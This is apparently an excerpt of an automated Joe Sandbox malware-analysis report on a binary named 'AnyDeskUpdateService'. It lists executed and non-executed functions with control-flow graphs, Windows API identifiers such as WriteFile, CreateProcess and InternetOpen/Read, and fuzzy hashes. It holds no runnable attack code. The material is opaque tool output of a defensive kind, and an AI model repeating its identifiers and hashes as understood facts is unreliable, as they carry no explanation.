7ff71dd97c38 call 7ff71dd9d424 1477->1478 1479 7ff71dd97c3d-7ff71dd97c48 call 7ff71dd97e74 1477->1479 1478->1479 1479->1443
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1236291503-0
                                                                                                      • Opcode ID: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction ID: 66b64beb2e039bdf75de4cdef55469f884561b8e68aa8a684930c741649545f7
                                                                                                      • Opcode Fuzzy Hash: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction Fuzzy Hash: 3B413E11E0CD0AA1EE18BB6494523B99292AF457A4FC54037E9CD473D7FE2EA80D8A71
                                                                                                      Function 00007FF71DDAC314 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1483 7ff71ddac314-7ff71ddac37a call 7ff71dd98000 1486 7ff71ddac3eb-7ff71ddac415 call 7ff71dd976f0 1483->1486 1487 7ff71ddac37c 1483->1487 1488 7ff71ddac381-7ff71ddac384 1487->1488 1490 7ff71ddac386-7ff71ddac38d 1488->1490 1491 7ff71ddac3aa-7ff71ddac3cf WriteFile 1488->1491 1493 7ff71ddac38f-7ff71ddac395 1490->1493 1494 7ff71ddac398-7ff71ddac3a8 1490->1494 1495 7ff71ddac3d1-7ff71ddac3da 1491->1495 1496 7ff71ddac3e3-7ff71ddac3e9 call 7ff71ddc0050 1491->1496 1493->1494 1494->1488 1494->1491 1495->1486 1497 7ff71ddac3dc-7ff71ddac3df 1495->1497 1496->1486 1497->1487 1499 7ff71ddac3e1 1497->1499 1499->1486
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction ID: 7c0f2cd182d9d7eb8670f5970d3de762f05df71a364a7c8b1afb7f043117b7cc
                                                                                                      • Opcode Fuzzy Hash: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction Fuzzy Hash: 3631C83661CE8596DB11AF19E4442A9B7A0FB58BA4F848037DB8D83754EF3CD519CB10
                                                                                                      Function 00007FF71DDAAFD4 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1501 7ff71ddaafd4-7ff71ddaafef 1502 7ff71ddaaff2-7ff71ddab01b 1501->1502 1503 7ff71ddab027-7ff71ddab030 1502->1503 1504 7ff71ddab01d-7ff71ddab022 1502->1504 1506 7ff71ddab032-7ff71ddab035 1503->1506 1507 7ff71ddab048 1503->1507 1505 7ff71ddab0b2-7ff71ddab0bb 1504->1505 1505->1502 1509 7ff71ddab0c1-7ff71ddab0db 1505->1509 1510 7ff71ddab041-7ff71ddab046 1506->1510 1511 7ff71ddab037-7ff71ddab03f 1506->1511 1508 7ff71ddab04d-7ff71ddab05e GetStdHandle 1507->1508 1512 7ff71ddab060-7ff71ddab06b GetFileType 1508->1512 1513 7ff71ddab08d-7ff71ddab0a5 1508->1513 1510->1508 1511->1508 1512->1513 1514 7ff71ddab06d-7ff71ddab078 1512->1514 1513->1505 1515 7ff71ddab0a7-7ff71ddab0ab 1513->1515 1516 7ff71ddab081-7ff71ddab084 1514->1516 1517 7ff71ddab07a-7ff71ddab07f 1514->1517 1515->1505 1516->1505 1518 7ff71ddab086-7ff71ddab08b 1516->1518 1517->1505 1518->1505
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction ID: 45b7085b39646d5c3f87c89869cee1a007f8f6a6e1b7a4083119a5f725ac47d0
                                                                                                      • Opcode Fuzzy Hash: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction Fuzzy Hash: D031E421A1CF5981DB209B148590138AA50FB46FB0FA5073ADBFE033E0DF38E4A6CB54
                                                                                                      Function 00007FF71DDACD38 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 918212764-0
                                                                                                      • Opcode ID: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction ID: 2b96ff26d7b181db0690b4fa7e07edc6377f4f5f9d4944d43f2302aa960f1f39
                                                                                                      • Opcode Fuzzy Hash: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction Fuzzy Hash: A821D714B0CE4A41FE907769945037C96919F86BB4FC88237D9AE473D1FE6CE4488B10
                                                                                                      Function 00007FF71DDB9D9C Relevance: 1.7, APIs: 1, Instructions: 181processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction ID: bc9bea253dc62372bece9b95a067bd53fb6a0c780936fdf5de2a095ffdb6aee7
                                                                                                      • Opcode Fuzzy Hash: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction Fuzzy Hash: 2181D636A0CBC599E7209B65A4400AEBBA4F745BBCF544136DECC03B98EF38D149CB10
                                                                                                      Function 00007FF71DD9D275 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction ID: 3ec638ccb2a22bd5c21a421c03ad4e741ca690cb6c83fe80f800e2cd1201d65b
                                                                                                      • Opcode Fuzzy Hash: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction Fuzzy Hash: B5219132A08A0989EB18AF68C4402EC73A1FB05728F844637D79D06AD5EF39D449CB64
                                                                                                      Function 00007FF71DDBA608 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 9d10737dc36b8b843b61fb58a14bc19d5b98b9f7f770ad25068d1438e06418a0
                                                                                                      • Instruction ID: 27e862f56925a7b4b1900ab29242c015368329a6c9d1f8e97a251ab0a9b9935c
                                                                                                      • Opcode Fuzzy Hash: 9d10737dc36b8b843b61fb58a14bc19d5b98b9f7f770ad25068d1438e06418a0
                                                                                                      • Instruction Fuzzy Hash: FA21047260CE458BDB20AF18D44037AB6A0EB85B69F945236E79D476D9FF7CD9088F00
                                                                                                      Function 00007FF71DDA5868 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 9c2b010f9fa43751fc1f95174d0124191e0158cc223ab54cdde051c009ea6ba6
                                                                                                      • Instruction ID: 21f513b8bfc4d63dc5a8294039182e86884b29be7a936ac54700639d9d12d14d
                                                                                                      • Opcode Fuzzy Hash: 9c2b010f9fa43751fc1f95174d0124191e0158cc223ab54cdde051c009ea6ba6
                                                                                                      • Instruction Fuzzy Hash: DE11A22290CE8981FE51BB5194003B9D690AF45FA0FD48533EACC07786EF6CF9088F60
                                                                                                      Function 00007FF71DDACF68 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 34fa0c17ac562eb5d37cc09ed756b26e56ee863967359fa7e16fcac7812e7201
                                                                                                      • Instruction ID: 288c3aacb40c382761f24e364eb9a5f075c75b51894e0a7ca6a7823ac3e475ed
                                                                                                      • Opcode Fuzzy Hash: 34fa0c17ac562eb5d37cc09ed756b26e56ee863967359fa7e16fcac7812e7201
                                                                                                      • Instruction Fuzzy Hash: 47F03A09E4EE0A45FE2476695940279D2909F84B70F888633DDAE453C1FE6CE44C8D70
                                                                                                      Function 00007FF71DD97CF0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF71DD97D04
                                                                                                        • Part of subcall function 00007FF71DD998F0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF71DD998F8
                                                                                                        • Part of subcall function 00007FF71DD998F0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF71DD998FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1208906642-0
                                                                                                      • Opcode ID: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction ID: 513f151435973c67e1e1548d4913eb1e4aa01550284f8648370f5fc1e8fcef30
                                                                                                      • Opcode Fuzzy Hash: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction Fuzzy Hash: 3EE0B610E4CA4FA4FE5C366115022B8C2425F21364ED1247BD8DD421C7BE0F650F2E71

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF71DDB6ED0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                      • String ID: utf8
                                                                                                      • API String ID: 3069159798-905460609
                                                                                                      • Opcode ID: 14816602239c270488777120d7bc797dcd23991c8037706dbea35f75d9bef3fc
                                                                                                      • Instruction ID: 016798323aff2280494b78626b7f15835f0f2e4e7914667d8a41447f35f4b5b0
                                                                                                      • Opcode Fuzzy Hash: 14816602239c270488777120d7bc797dcd23991c8037706dbea35f75d9bef3fc
                                                                                                      • Instruction Fuzzy Hash: 02919522A0CF4A66EB24BF11D4006B9A754EB46BA4F854137DA8C477C5FF3CE649CB60
                                                                                                      Function 00007FF71DD8CDF0 Relevance: 10.6, APIs: 7, Instructions: 90filenetworkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInternet$OpenRead$CloseCreateHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1744991900-0
                                                                                                      • Opcode ID: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction ID: e5ad79a69e054525cf717ec10edbdb225afd3bd4508d53c653da8c1c6c503a25
                                                                                                      • Opcode Fuzzy Hash: 362309099b881e5bbaf2cceeef3ea73f52e033be54d2f21a1e01227d0a0bf40a
                                                                                                      • Instruction Fuzzy Hash: 7231806161CA9A87EB209F55B41476AB760FB86BD4F84513ADE8D07B44EF3CD1088F14
                                                                                                      Function 00007FF71DDA478C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction ID: fb7027ce2595fcf965d6e36def1a152d9235c6a5c0b1e689fbb65d5856f7b128
                                                                                                      • Opcode Fuzzy Hash: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction Fuzzy Hash: DE318232618F8596DB609F25E8402AEB3A4FB89764F900136EACD43B58EF3CD1498F10
                                                                                                      Function 00007FF71DDB32B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: 658c65c6f5ef4d0db26e92ac1cc86db02e546a4b2c9906c63f91599e1882df55
                                                                                                      • Instruction ID: e3443e64604a12f373c593b7a0382d3afeb50fb7f4fc8ef94aaa82b91ec25fa5
                                                                                                      • Opcode Fuzzy Hash: 658c65c6f5ef4d0db26e92ac1cc86db02e546a4b2c9906c63f91599e1882df55
                                                                                                      • Instruction Fuzzy Hash: E5B1B422B1CE9A51EA61AB2594001BDE390EB46BF8FC44133ED9D47B85FE3CE549DB10
                                                                                                      Function 00007FF71DDAF064 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 3215553584-1896636505
                                                                                                      • Opcode ID: 78d1498a7ba4fc8b108e4d11ee0c9dc7d413f3dcf0b479bb9b363cac964cb1ff
                                                                                                      • Instruction ID: 9a8d7db16d31b83d042291bfae41935d6b5bb3759e8c88bd0afcd788175864fc
                                                                                                      • Opcode Fuzzy Hash: 78d1498a7ba4fc8b108e4d11ee0c9dc7d413f3dcf0b479bb9b363cac964cb1ff
                                                                                                      • Instruction Fuzzy Hash: 3791C623F0CE4A45FB24BB71945027DA6A06F45F78F9485F7EE8D063C5EE3CA4498A21
                                                                                                      Function 00007FF71DD91EF0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 221COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
